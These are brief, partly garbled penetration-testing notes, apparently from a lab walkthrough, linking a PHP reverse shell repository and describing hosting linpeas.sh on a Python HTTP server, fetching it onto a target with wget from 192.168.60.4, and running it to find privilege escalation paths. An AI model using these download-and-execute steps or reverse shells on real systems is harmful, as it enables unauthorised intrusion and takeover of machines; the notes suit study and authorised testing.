- is a tool that hunts for any privilege escalation
https://github.com/pentestmonkey/php-reverse-shell ↗
- create a server to host the linpeas.sh file
sudo python3 -m http.server 80 - then put the script in target machine
put in /tmp folder
wget [uri of server (http://192.168.60.4)]/linpeas.sh - execute it
chmod +x linpeas.shto make it executable
./linpeas.sh\